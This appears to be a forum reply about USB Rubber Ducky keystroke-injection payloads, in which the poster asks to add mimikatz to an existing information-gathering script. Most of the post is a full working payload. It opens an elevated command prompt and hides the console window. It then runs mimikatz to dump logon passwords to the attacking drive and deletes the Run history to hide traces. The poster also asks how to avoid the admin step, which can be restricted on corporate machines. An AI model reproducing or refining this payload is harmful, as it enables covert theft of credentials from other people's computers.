Thanks a bunch SnowMonster. This script is excellent and works perfectly. I wonder if it would be possible to add mimikatz to the payload after the information gathering stage.
Other mimikatz payloads first start cmd.exe as admin before executing mimikatz through powershell commands. For example:
DELAY 2000
GUI r
DELAY 500
STRING powershell Start-Process cmd.exe -verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500
CTRL C
REM *** Obfuscate the command prompt ***
STRING mode con:cols=18 lines=1
ENTER
STRING color FE
ENTER
REM *** Define Ducky Drive as DUCK ***
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500
REM *** Run Mimikatz from Ducky Drive ***
STRING powershell %duck%\im.ps1 -DumpCreds >> %duck%\%computername%-passwords.txt
ENTER
DELAY 100
STRING privilege::debug
ENTER
STRING sekurlsa::logonPasswords full
ENTER
DELAY 10000
STRING exit
ENTER
DELAY 5000
REM *** Clear duck variable, history, and GTFO ***
STRING set "duck="
ENTER
DELAY 100
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
DELAY 100
STRING color 08
ENTER
DELAY 100
STRING exit
ENTER
As you can see this is slower then simply executing several pre-made powershell files and requires admin cmd to start (which may be restricted in corporate environments.) I am wondering if it is possible to cut this stage out entirely and create a payload similar to your information gathering payload?
Thanks again.